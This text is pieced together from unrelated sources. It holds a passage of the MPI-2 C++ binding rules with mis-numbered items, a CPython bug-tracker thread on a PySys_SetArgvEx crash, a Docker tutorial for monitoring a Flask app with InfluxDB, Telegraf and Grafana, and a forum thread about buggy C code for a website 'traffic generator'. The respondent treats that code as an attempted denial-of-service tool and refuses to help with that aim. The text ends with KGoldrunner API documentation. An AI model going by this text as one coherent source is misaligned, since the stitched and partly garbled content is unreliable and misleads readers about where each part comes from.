3. If the argument list of an MPI function contains a scalar IN handle, and it makes sense to define the function as a method of the object corresponding to that handle, the function is made a member function of the corresponding MPI class. The member functions are named according to the corresponding MPI function name, but without the `` MPI_'' prefix and without the object name prefix (if applicable). In addition:
2. The function is declared const.
5. If the argument list contains a single OUT argument that is not of type MPI_STATUS (or an array), that argument is dropped from the list and the function returns that value.
Example The C++ binding for MPI_COMM_SIZE is int MPI::Comm::Get_size(void) const.
6. If there are multiple OUT arguments in the argument list, one is chosen as the return value and is removed from the list.
7. If the argument list does not contain any OUT arguments, the function returns void.
Example The C++ binding for MPI_REQUEST_FREE is void MPI::Request::Free(void)
8. MPI functions to which the above rules do not apply are not members of any class, but are defined in the MPI namespace.
Example The C++ binding for MPI_BUFFER_ATTACH is void MPI::Attach_buffer(void* buffer, int size).
9. All class names, defined types, and function names have only their first letter capitalized. Defined constants are in all capital letters.
10. Any IN pointer, reference, or array argument must be declared const.
11. Handles are passed by reference.
12. Array arguments are denoted with square brackets ( []), not pointers, as this is more semantically precise. | http://www.mcs.anl.gov/research/projects/mpi/mpi-standard/mpi-report-2.0/node21.htm | CC-MAIN-2014-42 | refinedweb | 1,248 | 55.34 |
undefined symbol: wl_proxy_marshal_constructor_versioned
When I write
import cv2
I get this error
ImportError: /lib/x86_64-linux-gnu/libgdk-3.so.0: undefined symbol: wl_proxy_marshal_constructor_versioned
I use Ubuntu 19.04
How can I resolve this?
opencv version ? how did you install that ? from where ? from src ?
I used this guide-...
@alon3. What command did you install libgdk?
@supra56 sudo apt-get install libgdk-pixbuf2.0-dev
Here is link: libgdk3.0-0
You suppose to install first
libgtk-3-0then you will
libgdk-pixbuf2.0
@supra56 I write sudo apt-get install libgtk-3-0 and then sudo apt-get install libgdk-pixbuf2.0 but it didnt resolve the problem | https://answers.opencv.org/question/219187/undefined-symbol-wl_proxy_marshal_constructor_versioned/ | CC-MAIN-2021-10 | refinedweb | 109 | 63.66 |
whatever 0.4.1
Easy way to make anonymous functions by partial application of operators.
An easy way to make lambdas by partial application of python operators.
Inspired by Perl 6 one, see
Usage
from whatever import _, that # get a list of guys names names = map(_.name, guys) names = map(that.name, guys) odd = map(_ * 2 + 1, range(10)) squares = map(_ ** 2, range(100)) small_squares = filter(_ < 100, squares) best = max(tries, key=_.score) sort(guys, key=-that.height) factorial = lambda n: reduce(_ * _, range(2, n+1))
NOTE: chained comparisons cannot be implemented since there is no boolean overloading in python.
CAVEATS
In some special cases whatever can cause confusion:
_.attr # this makes callable obj._ # this fetches '_' attribute of obj _[key] # this works too d[_] # KeyError, most probably _._ # short for attrgetter('_') _[_] # short for lambda d, k: d[k] if _ == 'Any value': # You will get here, definitely # `_ == something` produces callable, which is true [1, 2, _ * 2, None].index('hi') # => 2, since bool(_ * 2 == 'hi') is True
Also, whatever sometimes fails on late binding:
(_ * 2)('2') # -> NotImplemented
- Downloads (All Versions):
- 7 downloads in the last day
- 141 downloads in the last week
- 506 downloads in the last month
- Author: Alexander Schepanovski
- License: BSD
- Categories
- Development Status :: 4 - Beta
- Intended Audience :: Developers
- License :: OSI Approved :: BSD License
- Operating System :: OS Independent
- Programming Language :: Python
- Programming Language :: Python :: 2
- Programming Language :: Python :: 2.6
- Programming Language :: Python :: 3
- Programming Language :: Python :: 3.3
- Programming Language :: Python :: 3.4
- Programming Language :: Python :: Implementation :: CPython
- Programming Language :: Python :: Implementation :: PyPy
- Topic :: Software Development :: Libraries :: Python Modules
- Package Index Owner: suor
- DOAP record: whatever-0.4.1.xml | https://pypi.python.org/pypi/whatever | CC-MAIN-2015-40 | refinedweb | 293 | 54.32 |
Source
RSS
php jquery div resize
sponsored links
Jquery the resize method
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " "> <html> <head> <meta http- <title>Insert title here</title>
JQuery div fade effects to achieve
Oh, finally is the first study JQuery, JQuery reference on a greater understanding. Here, let me know the JQuery code is written in what place.
Let div resize based on content
div1 ( width: auto; display: inline-block! important; display: inline; )
[JQuery] FullCalendar Memo
1. With the google calendar link, do not forget to join <script type='text/javascript' src='js/gcal.js'/> events: $. fullCalendar.gcalFeed (" @ gmail.com/private-660ae86cc26345cff34304
jQuery grammar summary and Notes
1, Introduction 1.1, an overview of WEB2.0 and ajax with the idea at the rapid development of Internet communication, one after another there have been some excellent Js framework, there is one of the most famous Prototype, YUI, jQuery, mootools, Bindows,
jQuery Caution Point Skills 1
1, $ function, the use of skill and attention to points <div value="content"> aaa </ div> $ ( "# msg"). value is written is wrong, because: Through jquery's $ () reference element, including through the id, class, ...
JQuery skills summary (reproduced)
1, on a reference page elements by jquery's $ () reference element, including through the id, class, element names, as well as elements of the level of relations and conditions of dom, or xpath method, and returns the object for the jquery object ...
jquery Skills Summary
jquery skill concluded a brief 1.1, an overview of thinking as WEB2.0 and ajax on the Internet, the rapid development of communication, one after another there have been some excellent Js frameworks, which are more well-known Prototype, YUI, jQuery, mooto
jquery rookie Getting Started
Transfer from: B7% C9% D4% BD% CA% B1% C9% D0/blog/item/c96d3716fc57da1d972b43e1.html I. Introduction 1.1, an overview of thinking as WEB2.0 and ajax on the Internet, the rapid development of communication, one after another there ha
add jquery.linscroll new function (js css scroll bar ie6 ie7 ff)
usage: $ ('. ScrollContent'). SetScrollNoArrow ((img: '_common / img / scrollbar / scroll_bar.jpg', width: 8), (Img: '_common / img / scrollbar / scroll_btn.jpg', height: 16) ); <script> / * * Adding by Jerome Xie * Supportin
jQuery + Ajax + Struts2. js javascript
(1) jQuery's basic usage: WEB2.0 and ideas with ajax the rapid development of Internet communication, one after another there are some excellent Js framework, some of the more famous are Prototype, YUI, jQuery, mootools, Bindows and domestic JSVM fram
jQuery great running skills
jQuery Great running skills 1. A reference element on the page By jquery's $() Reference element, including through id.class. Element name and element-level relations and dom Xpath conditions or methods , And return the object to jquery object ( Colle
jQuery skills summary (z) with more detailed information on 07, there needs to be updated. . . . I. Introduction 1.1 Overview <br /> WEB2.0 and ajax with ideas on the Internet's rapid development of communication, one after
JQuery Technical Summary
Keywords: jquery Transfer from: I. Introduction 1.1, an overview of ideas with the ajax WEB2.0 and the rapid development of Internet communication, one after another there are some excel
jquery and prototype conflict Using jQuery with Other Libraries
Category: Overriding the -function (rewrite $) However, you can override that default by calling jQuery.noConflict () at any point after jQuery and the other library have both loaded. For example: The first is to join jQuery.noConflict (); using jQue ...
Common Skills jquery
Abstract: 1, a reference element on the page by jquery's $ () reference element, including through the id, class, element name, and the elements of hierarchy and the dom xpath conditions or methods, and the return of the object for the jquery object (
jQuery 1.4: 15 you should be aware of the new features (translation)
jQuery('ul li:contains( Apple )').nextUntil(':contains( Pears )'); // Get banana , Grape, Strawberry jQuery 1.4: 15 A you should be aware of the new features (translation) Collection view plaincopy to clipboardprint? jQuery ('ul li
Introduction to JQuery
I. Introduction 1.1 Overview With the thought WEB2.0 and ajax development in the rapid spread of the Internet, start to appear some wonderful Js framework, some of the more famous are Prototype, YUI, jQuery, mootools, Bindows as well as domestic JSVM fram
jquery Syntax Summary
1. A reference element on the page By jquery's $() Reference element, including through id.class. Element name and element-level relations and dom Xpath conditions or methods , And return the object to jquery object ( Collection object ), Dom can not
[Change] jQuery great running skills
jQuery great running skills 1, a reference element on the page by jquery's $ () reference element, including through the id, class, element name, and the elements of hierarchy and the dom xpath conditions or methods, and the return of the object for t
Fall in love with jquery 1.4 (the latest API and offline development attached manual)
1. Pass parameters to the jQuery (...) Before, jQuery can be attr method of setting an attribute, can transfer the property name and value, it can contain several groups of a particular object attribute name-value pairs. In jQuery 1.4, you can put a param
JQuery several useful methods
$. Browser. Browser type: detection of browser type. Effective parameters: safari, opera, msie, mozilla. Such as the test for ie: $. Browser.isie, ie the browser is returned true. $. Each (obj, fn): GM's iteration function. Iteration can be used
jQuery: jQuery to expose hidden features
jQuery does not like his face shown, only those who rated the methods available to us. Other within the code in his library with a lot of cool potential method is convenient, we are waiting to be discovered. In this article, I will lead you to appreciate
jQuery 1.4 released: new features of the 15 instances of Jingjiang
Wrote jQuery 1.4 recently released. Than we expected, this is not a simple patchwork, 1.4 includes many new features, enhancements and performance improvements! This immediately introduces you to those you may find useful new features and optimization enh
Jquery and Prototype co-existence approach
Way: Java code <html> <head> <script src="prototype.js"> </ script> <script src="jquery.js"> </ script> <script> jQuery.noConflict (); / / Use jQuery via jQuery (...) jQuery (document). re
Jquery javascript framework to co-exist with other
GENERAL The jQuery library, and virtually all of its plugins are constrained within the jQuery namespace. As a general rule, "global" objects are stored inside the jQuery namespace as well, so you shouldn't get a clash between jQuery and any
jQuery to find all child elements
Using the selector to select a particular element'd easily what. Css (), find () ah a lot, find all the child elements, but there was a welcome surprise for a half will not find a way, but later found that one-pass wildcards. Find all descendant
jQuery to achieve the principle of - the implementation of a debug class
Js code debugging often need to use alert (), each time heard harsh 'when ...', then write a brief on their own debug information output function debug. Recently, the jQuery framework, so he modeled his writing style improved a bit. Here I put som
Some common methods jQuery (Reprinted)
Reprinted Style of operating elements include the following ways: $ ("# Msg"). Css ("background"); / / returns the background color of the element $ ("# Msg"
Skills Summary jquery [transfer]
I. Introduction 1.1 Overview and ajax thoughts with WEB2.0 the rapid development of Internet communication, has been found in some excellent Js framework, one of the more famous are Prototype, YUI, jQuery, mootools, Bindows and domestic JSVM frameworks, t
Solution is not compatible with jquery and prototype of the Road
$ jquery and prototype are used instead of frequent document.getElementById () operation, so they must be used together, can cause conflict , how to get jquery and prototype -compatible coexistence of it, which I described the following two methods:
set the background image div
JavaEE developer and rarely write directly JS code. The author is also true, at best, is to use jQuery for JS control. Why go the set as the background to the DIV in jQuery? Because jQuery DIV is the most common element. Use the following method which set
jquery Skills Summary (rpm)
jquery Skills Summary (transfer): I. Introduction 1.1 Overview and ajax thoughts with WEB2.0 the rapid development of Internet communication, has been found in some excellent Js framework, one of the more famous are Prototype, YUI, jQuery, mootools, Bindo
JQuery common technique: jquery dom object object conversion
1, reference to the element on the page by jquery's $ () refers to elements, including through the id, class, element names and hierarchical relationships of elements and the dom xpath conditions or methods, and the return of the object is jquery obje
function createDiv(){ jQuery("body").css({overflow:"hidden"}); var browserwidth = jQuery(window).width(); var browserheight=jQuery(window).height(); var scrollleft = jQuery(window).scrollLeft(); var scrolltop = jQuery(window).scrollTop(); var height =brow
jQuery and prototype co-
Way a (recommended) <html> <head> <script src="boot.js"></script> <script> var $j = $import("org.jquery.$"); var $p= $import("net.nioc.prototype.$"); //Use jQuery via $j(...) $j(document).ready(function(){ $j("div").hide
jquery1.4 Chinese Document
jquery1.4 Chinese Document Original: By convention, we provide two copies of jQuery, one is minimized ( We are now using Google Closure as the default compression tool ), One is uncompressed ( For error correcti
javascript Summary (1) the framework
Done. NET, ROR, now two years of full-time JS. On the development process, problems and did practice, and from the following aspects, be a memory account when summing up. The framework is only a general overview, I hope you will participate in the di ...
ajaxfileupload upload files with parameters
Best be achieved by working in the file upload without refresh, of course, can not be achieved XmlHttpRequest object file uploading. After the fileupload google to find JQuery plug, this plug-in through an IFrame and create a form in the IFrame to ac ...
jQuey grammar summary and notes
1, a reference element on the page by jquery's $ () reference element, including through the id, class, element name, and the elements of hierarchy and the dom xpath conditions or methods, and the return of the object for the jquery object (a collecti
jQueryDIV automatic contour
View results Download jQuery DIV automatic contour plug, that is to control the website content within the DIV element regardless of the number of them will be calculated automatically through the high, so that your page layout is more beautiful, to
jquery1.43 core source code analysis
jquery core Of a structure jquery. Compared to other traditional library constructed object methods. Jquery provides a very different approach. It chooses to create a new strange world. First of all the jquery code is an automatically wrapped up the closu
Adding jquery canceled and the contents of the div to replace demo
Recent projects often applied to the jQuery, with the specific cases a brief introduction to jQuery's div contents to add, cancel and replace the relevant content such as application skills. Case: Add institution information, and at the same time ...
My first jQuery plugin - rounded DIV
Effect: Reference: round.css: round.js: html: Details see Annex! Relatively simple, do not laughed ah!
jquery animate the div
QQ subscription box, in the health news Forum, a feature is that when click on the title will display dynamic news content, click again to put away when the contents show only a brief introduction. Mimic the function of practice today and the next jq
jQuery hover Div background transformation (color slide)
<html> <head> <meta http- <title> jQuery hover Div background transformation </ title> <style type="text/css"> . Divbox ( hei
Original: Div + CSS + JS dialog box (using JQuery)
CSS section /*-------- Div dialog -----------*/ # Dialog ( background-color: # 89A6CA; height: 180px; width: 300px; border: 1px solid # 999; position: absolute; z-index: 9999; ) # Dialog # title ( background-image: url (images / pupop_bg.png); background-
jquery scroll in the end determine whether the Department of div
<! DOCTYPE HTML PUBLIC "- / / W3C / / DTD HTML 4.0 Transitional / / EN"> <HTML> <HEAD> <TITLE> This is main page. </ TITLE> <META NAME="Generator" CONTENT="EditPlus"> <META NAME=
jQuery: the coordinates of the mouse and div
jQuery coordinates of the mouse and div Scenario: When the mouse leaves the div, remove the div after 3 seconds The div's class for the sp function spon_out(event){ var x=event.pageX-this.offsetLeft; var y=event.pageY-this.offsetTop; if(x < 0
jQuery to submit parameter returns the data and displayed in the div
Description: The above two kinds of methods can be! Which test for the server url, returns the data to a jsp page that displays the contents of this page id of the DIV in the post. (info: 'He He') for the parameters passed to the server
Recent
http pku.eunji.com zggps2014
dwr callback boolean
nginx play framework proxy
http: 61.133.106.7006 wlkp
http 172.16.1.7jwweb
windows mod_wl_22下载
http::8089
http: 172.28.2.166 apms
搜索 222.86.224.160:8088
Recent Entries
Agitator
AltaVista search engine, directory traversal problems
Open-source book Continuous Integration with Hudson
css to achieve the directory tree navigation menu
I think design patterns series (2) - Strategy pattern [C + +, design patterns]
Background task processing and deferred execution in Django
[Transferred] to a small team with an average age of
FLEX and JAVA on the performance front-end communication and speed of response
Acquaintance J2EE and AJAX
BPM Workflow Learning
Tag Cloud
php calculate total gridview
mvc3 how to load objects into a table
osb jms example
zk Window focus
span innerhtml dwr
fullcalendar save events asp.net
getactiveobject sapgui
http: 192.168.0.65:7001 LGSFLS
embedded, embeddable and crud
showmodaldialog in spring example
jquery event key imemode
how to automate black berry simulator using qtp
ejb 2" tutorial "WebSphere Process
tadoquery before delete
f5 press from javascript
HTML5 xsd schema
adito+proxy+connect
primefaces code complete not working in eclipse
struts1, print bean attributes
extjs filtrer datastore
what is request timeout in flex 3 httpservice
linkedhashmap memory
free download itextrenderer jar
Array Parsing in Jackson
MVP GWT sample application code
extjs desktop right click
template richfaces with listbox
netbeans uml
css exceptions
Random Entries
Super simple. Super-useful version of the preview feature to upgrade gadgets ----
js Operation Gadget Tips
linux command-line multi-threaded downloading tool
Internet of Things should really start? - Property networking software
oracle dataguard physical configuration
hibernate under import.sql the i18n issues
Under the simple linux device-dpSegmentation Chinese word
Pthread_t * thread to thread variables dynamically allocated space
[Transfer] A * algorithm using the heuristic function (2)
(Rpm) collection a piece of code, spare
Categories
Codeweblog
Java
PHP
Ruby
AJAX
Development
Web
Mobile
CPP
Python
Flash
DotNet
Database
OS
Tech
Develop
Industry
Internet
Related
bubbleSorting arraylist
open source iphone mmo
jquery +"image" contrast
castor myeclipse tutorial
hibernate cause tomcat outofmemory
TUTORIAL JAVA + FLEX + IREPORT
webdriver findelement
silverlight serialize bitmapimage
comparison of two values in flex
aidl import custom android
url encode commandline linux arabic php
apkdecoder threadsave
http: 192.168.1.51:85 webcamera.html
http:1158.130.21.6 qass
w3.te577
CodeWeblog.com
XHTML
CSS
Processed in 0.058 second(s), 11 Queries. | http://www.codeweblog.com/stag/php-jquery-div-resize/ | CC-MAIN-2014-52 | refinedweb | 2,537 | 52.8 |
Created on 2019-08-23 07:39 by hroncok, last changed 2019-09-05 14:43 by vstinner. This issue is now closed.
There is a regression between Python 3.7 and 3.8 when using PySys_SetArgvEx(0, NULL, 0).
Consider this example:
#include <Python.h>
int main() {
Py_Initialize();
PySys_SetArgvEx(0, NULL, 0); /* HERE */
PyRun_SimpleString("from time import time,ctime\n"
"print('Today is', ctime(time()))\n");
Py_FinalizeEx();
return 0;
}
This works in 3.7 but no longer does in 3.8:
$ gcc $(python3.7-config --cflags --ldflags) example.c
$ ./a.out
Today is Fri Aug 23 07:59:52 2019
$ gcc $(python3.8-config --cflags --ldflags --embed) example.c
$ ./a.out
Fatal Python error: no mem for sys.argv
SystemError: /builddir/build/BUILD/Python-3.8.0b3/Objects/unicodeobject.c:2089: bad argument to internal function
Current thread 0x00007f12c78b9740 (most recent call first):
Aborted (core dumped)
The documentation explicitly mentions passing 0 to PySys_SetArgvEx:
"if argc is 0..."
So I guess this is not something you shouldn't do.
Oops, it's my fault! PR 15415 fix the crash.
The regression was introduced by:
commit 74f6568bbd3e70806ea3219e8bacb386ad802ccf
Author: Victor Stinner <vstinner@redhat.com>
Date: Fri Mar 15 15:08:05 2019 +0100
bpo-36301: Add _PyWstrList structure (GH-12343)
Simplified change:
- static wchar_t *empty_argv[1] = {L""};
+ wchar_t* empty_argv[1] = {L""};
It's a deliberate change to not waste memory: PySys_SetArgvEx() (make_sys_argv()) is only called once, whereas static keeps the memory for the whole lifecycle of the process.
But I didn't notice a subtle issue with memory allocated on the stack: the code works well with gcc -O0! The bug only triggers with gcc -O3.
New changeset c48682509dc49b43fe914fe6c502bc390345d1c2 by Victor Stinner in branch 'master':
bpo-37926: Fix PySys_SetArgvEx(0, NULL, 0) crash (GH-15415)
New changeset ca9ae94a2aba35d94ac1ec081f9bcac3a13aebd3 by Victor Stinner in branch '3.8':
bpo-37926: Fix PySys_SetArgvEx(0, NULL, 0) crash (GH-15415) (GH-15420)
I tested my fix manually using example from msg350262 and gcc -O3 (./configure && make): I can reproduce the crash without the change, and I confirm that my change fix the crash.
Thanks Miro for the bug report: the fix will be included in next Python 3.8 beta release. I fixed the bug in 3.8 and master branches (3.7 is not affected).
FYI this bug was found in paraview in Fedora Rawhide: | https://bugs.python.org/issue37926 | CC-MAIN-2021-21 | refinedweb | 390 | 69.28 |
Knock yourself out with whatever changes you want to make. Change the class,
move it, rename it... the result is, unless my tests have a bug, the solvers
need some work.
Enjoy!
-Greg
On Sat, Oct 1, 2011 at 9:50 PM, Gilles Sadowski <
gilles@harfang.homelinux.org> wrote:
> Hi Greg.[1]
>
> On Sat, Oct 01, 2011 at 08:28:52PM -0500, Greg Sterijevski wrote:
> > Per Phil's suggestion, they are now in
> > test/../../optimizers/NISTBatteryTest.java See JIRA: MATH-678 for further
> > info.
>
> There currently isn't much info over there...
>
> Also, the new "NISTBatteryTest" test class is quite unwieldy. The usual way
> would be that one unit test class tests for its corresponding class in the
> "main" source code. E.g.
> BOBYQAOptimizerTest
> contains tests for
> BOBYQAOptimizer
>
> So, instead of clumping all tests for all optimizers in a single
> "BatteryTest"
> class (and discriminate by long method names that contain the optimizer
> class name), they should rather go in their own optimizer-dedicated
> classes,
> e.g.:
> BOBYQAOptimizerNISTTest
> PowellOptimizerNISTTest
> etc.
> Hence someone can concentrate on fixing one optimizer at a time, focusing
> on
> one test class at a time.
>
> You can use inheritance in order to store all the common functionality:
>
> public class NISTAbstractTest {
> // Common functions and general test routines and checks.
>
> private double[] run(MultivariateRealOptimizer optim,
> DifferentiableMultivariateRealFunction func,
> double[] start) {
> return optim.optimize(1000000, func, GoalType.MINIMIZE,
> start).getPointRef();
> }
> }
>
> BOBYQAOptimizerNISTTest extends NISTAbstractTest {
> @Test
> public void lanczos() {
> double[] result = run(new BOBYQAOptimizer(10),
> lanczosObjectFunc,
> new double[] { 1.2, 0.3, 5.6, 5.5, 6.5, 7.6
> });
> TestUtils.assertEquals(correctParamLanczos, result, 1e-8);
> }
> }
>
> That would also make it easier to connect specific JIRA tickets to specific
> issues/optimizers, as suggested by Phil.
>
> >
> > Incidentally, the tests were attached to the email thread in regard to
> > NonLinearConjugateGradientSolver.
>
> I didn't get any message with such an attachement. Are you sure that it
> wasn't stripped off?
> Anyways, _this_ thread, and my question, is about coverage of the BOBYQA
> code. Testing for this shortcoming of our BOBYQA test suite is not the same
> issue as an optimizer failing the NIST test suite. Hence the request to
> create a specific (and possibly temporary) "BOBYQAOptimizerCoverageTest".
>
>
> Best regards,
> Gilles
>
> [1] A: Because it messes up the order in which people normally read text.
> Q: Why is top-posting such a bad thing?
> A: Top-posting.
> Q: What is the most annoying thing in e-mail?
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
> For additional commands, e-mail: dev-help@commons.apache.org
>
> | http://mail-archives.apache.org/mod_mbox/commons-dev/201110.mbox/%3CCACMPRi1ZiXVa471kAjuoCO1Nsk34Fmo7zmyxCz6QP9_gAuiV4g@mail.gmail.com%3E | CC-MAIN-2015-32 | refinedweb | 418 | 50.02 |
I have two separate .py files. One contains my GUI environment, and the other holds the functions used by that environment. I imported the class with the functions into the GUI file and from the GUI created an object of said class. However when I go to run a method/function from within the GUI, I get an error letting me know...
- Code: Select all
TypeError: ckbutton1() takes 0 positional arguments but 1 was given
Traceback (most recent call last):
File "C:\Users\funk\Documents\program.py", line 125, in <module>
sys.exit(app.exec_())
SystemExit: 0
I've tried counteracting this by using *args as an argument when defining my functions, but this doesn't seem to help.
I've been told before that I need to use 'self' so I tried using it as a lone argument, and the results were more of the same. I then learned about the __init__ function, which to me looks like it should just do initial tasks for you, such as alias 'self.object' to 'object', or something like that. In pseudo-code, here's a piece of my two files.
- Code: Select all
class exampleclass:
def __init__(self):
# Do some initial text doodad.
# potentially important
def ckbutton1(self):
print("test test test")
and the GUI...
- Code: Select all
example = exampleclass()
when button 'pressed': example.chkbutton1
Anyone out there have the time to clear this up for me? I read through the documentation on passing arguments and it was weird to me, to say the least. Also, I apologize if any of this doesn't make much sense, I'm incredibly tired today. | http://www.python-forum.org/viewtopic.php?f=10&t=6939 | CC-MAIN-2017-13 | refinedweb | 271 | 65.01 |
We will go through a tutorial where Python and Flask will be used. However, you will soon realize that Python and Flask are the less important parts here. Due to the nature of the setup (a docker-compose file) you shouldn't have any trouble swapping the Docker for my Flask app with whatever else you want to monitor.
So, what are we actually doing here? What is the final goal?
We will create docker compose file which will instantiate the following services:
- A web app of your own that you want to monitor
- An instance of Telegraf, which is a tool that can send all sorts of metrics about your app's performance to a database.
- An instance of InfluxDB, which is the database where all the Telegraf info will go to, and also where you will write your own metrics from your application.
- Grafana, which will serve to create an awesome dashboard and display all that information.
Look at the power of Grafana by visiting their demo here
The duo Telegraf/InfluxDB might get confusing. You could consider that Telegraf will record into InfluxDB data about your performance (cpu usage, memory usage, etc...) But if you want to record things related to the content of your app (requests made to a certain endpoint, how many times a function has been called, how many times it throws an error...) you need to actively save that into InfluxDB from your application. We will see how.
Getting Started
You may clone my repo if you want to follow this easier, or build it yourself as we go:
Setting up the project
Your app
Go to the folder that contains the app you want to use for this (or look at the cloned repo). The important thing is that you should have a working
Dockerfile that if you run it, it launches your app standalone.
Now go ahead and create an empty
docker-compose.yaml file.
version: "3" services: metricsweb: container_name: metricsweb build: . ports: - 5000:5000 depends_on: - influxdb
As you see, we start by adding one service: Our app. In my case, it's a Flask app, so I am opening the port 5000. This service depends on the future service
influxdb. Notice the
build parameter. For it to work, you need to have a
Dockerfile in the same directory. Mine looks like this:
FROM python:3.7.4-slim-stretch COPY . /app WORKDIR /app EXPOSE 5000 RUN pip install -r requirements.txt ENTRYPOINT python /app/main.py
Grafana
Grafana is an open source analytics and visualizations solution which is compatible with a lot of databases. In this example we are using InfluxDB since it's really quick and optimized to store time series data, but for example you make Grafana read from your SQL database.
For more information, visit their website
This is the relevant bit you need to add in the
docker-compose:
grafana: container_name: grafana image: grafana/grafana:latest ports: - 3000:3000 volumes: - ./grafana/data:/var/lib/grafana
Pretty straightforward. Grafana uses the port 3000 for the web app. We will configure this later.
InfluxDB
Take a look at the Influx website so you will get an idea about its features. In order to add it to our stack, we need this additional piece inside our docker-compose file:
influxdb: container_name: influxdb image: influxdb:latest ports: - 8086:8086 env_file: - 'env.influxdb' volumes: - ./influxdb/data:/var/lib/influxdb
Some important things:
- I am mounting a local directory volume to store the data. This is so data persist even if you destroy the stack and recreate it again (I did the same with Grafana in the previous step)
- I am reading some variables from an env file. You could also insert them straight into the yaml file, it makes no difference. The most important variable is
INFLUX_DB, which tells you the name of the DB that will be created when the stack goes up. Here is the file I am using:
INFLUXDB_DATA_ENGINE=tsm1 INFLUXDB_REPORTING_DISABLED=false INFLUX_DB=metrics INFLUXDB_USER=admin INFLUXDB_ADMIN_ENABLED=true
Telegraf
Telegraf is made by the same company that makes InfluxDB. You can read more about that here It's a server agent with a lot of plugins that can connect to InfluxDB and store many metrics about your application: CPU usage, memory usage, etc... You can definitely extend what it can detect.
This is the relevant docker-compose bit:
telegraf: container_name: telegraf image: telegraf container_name: telegraf restart: always depends_on: - influxdb environment: HOST_PROC: /rootfs/proc HOST_SYS: /rootfs/sys HOST_ETC: /rootfs/etc volumes: - ./telegraf.conf:/etc/telegraf/telegraf.conf:ro - /var/run/docker.sock:/var/run/docker.sock:ro - /sys:/rootfs/sys:ro - /proc:/rootfs/proc:ro - /etc:/rootfs/etc:ro
Notice that besides the volumes that we mount to have persisting data, we have some environment variables telling Telegraf where to get certain information about processes and system.
For the volumes part to work, you will need to create a
telegraf.conf file in your local directory with some settings. Here you can see the contents. It's pretty basic and surely it can be improved.
To summarize, here is the full
docker-compose.yaml that you will need:
Add code for your metrics
You are ALMOST done. If we would bring up the stack right now, everything would work fine, except the fact that your application wouldn't be sending anything to Influx and you would only have access to system data. Let's add something:
Consider that I only have a
main.py file which is a very simple Flask web app, this is what I have:
from flask import Flask from datetime import datetime from influxdb import InfluxDBClient client = InfluxDBClient('influxdb', 8086, 'admin', 'admin', 'metrics') app = Flask(__name__) @app.route("/hello") def hello(): client.write_points([{ "measurement": "endpoint_request", "tags": { "endpoint": "/hello", }, "time": datetime.now(), "fields": { "value": 1 } }]) return "Hello World!" @app.route("/bye") def bye(): client.write_points([{ "measurement": "endpoint_request", "tags": { "endpoint": "/bye", }, "time": datetime.now(), "fields": { "value": 1 } }]) return "Bye World!" if __name__ == "__main__": app.run (host="0.0.0.0")
See how we first initialize a client for the database with the proper parameters, and then on each endpoint, we call the method to write into the database with the relevant content. I have chosen to record a "1" every time the endpoint is called, so later I can visualize that in the dashboard by requesting the sum of that field. Not the only way to do this, but just one way.
Up and running
Build with docker-compose
Run this in your console to bring the stack up:
docker-compose up --build
(to bring it up later on, omit the build argument if you don't have anything new to rebuild)
Your stack would now run on interactive mode (you will see the logging appearing in your console). You can stop it by pressing Ctrl+C. However, by doing so the stack doesn't fully go down. You would then need to do
docker-compose down
If you want to launch it detached from the console, do
docker-compose up -d
Configuring the dashboard
Ok, so your stack is up and running. Make some calls to your api endpoints so it registers some visits and there is some data recorded in the database. Then open Grafana by going to
How to use Grafana
After login (admin/admin), first thing you need to do is to add a data source:
You need to configure InfluxDB using
influxdb as a host name, because that is the name of the service in the docker compose file. Otherwise we would need to inspect the container to find the internal Docker IP address and that's more convoluted because it can change. Using
influxdb to autodiscover the current IP will save us the trouble.
Create a new dashboard...
And you are ready to add new panels. For this example I am going to add the percentage of idle CPU. I have this data courtesy of Telegraf. Since this is a trivial app, you will see that the percentage is huge, because I am doing nearly nothing with this app:
If you click on the lower part of the screen, in the query builder, you can select your FROM (in this example we only have one database) and that should autopopulate the dropdown menus with the available selections.
Look at this other panel. This creates a counter of the amount of times
/hello has been visited. This data comes from the influxdb code that we have put into our Python app
Look how
endpoint_request appears in the dropdown, since that is the key we are saving from our code. Then you can choose what to do with this data. In my case I present the sum of all entries in a counter.
As you see, Grafana is a really cool and comprehensive tool. I recommend you to play around building panels for different metrics. It's really powerful!
I hope you could find some use from this tutorial. Grafana and Influx are also a new subject for me, so if you have any tips or comments, let me know!
Discussion (0) | https://dev.to/rubenwap/monitor-the-behavior-of-your-python-app-by-learning-influxdb-grafana-and-telegraf-3ehg | CC-MAIN-2021-43 | refinedweb | 1,519 | 62.78 |
This forum is closed. Thank you for your contributions.
i am trying to build a traffic gererator. the debug picks up no errors but when i run it it won't work. The error is at. My code is
#include "pch.h"
#include <stdio.h>
#include <iostream>
#include <Windows.h>
#include <string>
using namespace std;
char x = 0;
int y = 0;
int a = 0;
char z = 0;
int main()
{
printf("Enter Website to Bot\n");
scanf("%c", x);
printf("Number of Bots to Send to Link\n");
scanf("%s", y);
printf("Browser You Would Like to Open Website In\n");
scanf("%c", z);
while (x < a) {
system("<z> x");
x = x-1;
}
}
Your code has several problems:
The first scanf needs &x, not x, as the second argument. Same issue with third scanf.
The second scanf needs %d and &y, not %s and y, to read an int into y.
Your while statement will evaluate to false since x will be positive.
Your call to the system function will not cause <z> or x to be expanded and replaced with the one character values of z and x. It will actually try to execute the command <z> and the argument to that command will
be the letter x.
Your design has problems also:
How do you intend to fit the name of a website in a single char?
How do you intend to fit the name of a browser in a single char?
Why are you using global variables?
Why are you including unused headers pch.h, iostream, and string?
Why are you compiling as C++ when your entire function is in C?
You need to acquire some basic programming skills before attempting a complicated project. You will get much better support if post in one of the Visual C forums.
And once you acquire the skills, you should pick a project other than trying to launch a denial of service attack against a website. If you persist in this particular endeavor, you will probably get no help at all in any of these forums. | https://social.microsoft.com/Forums/en-US/fa696115-242b-48a0-868b-8c91f41440d7/c-error?forum=academicprojectprogram | CC-MAIN-2022-27 | refinedweb | 345 | 82.95 |
kgoldrunner
#include <kgoldrunner.h>
Detailed Description
This class serves as the main window for KGoldrunner.
It handles the menu, toolbar and keystroke actions and sets up the game, scene and view.
Main window class
Definition at line 41 of file kgoldrunner.h.
Constructor & Destructor Documentation
Default Constructor.
Definition at line 56 of file kgoldrunner.cpp.
Default Destructor.
Definition at line 177 of file kgoldrunner.cpp.
Member Function Documentation
Definition at line 676 of file kgoldrunner.cpp.
Definition at line 686 of file kgoldrunner.cpp.
To save edits before closing.
Definition at line 908 of file kgoldrunner.cpp.
This function is called when this app is restored.
The KConfig object points to the session management config file that was saved with saveProperties.
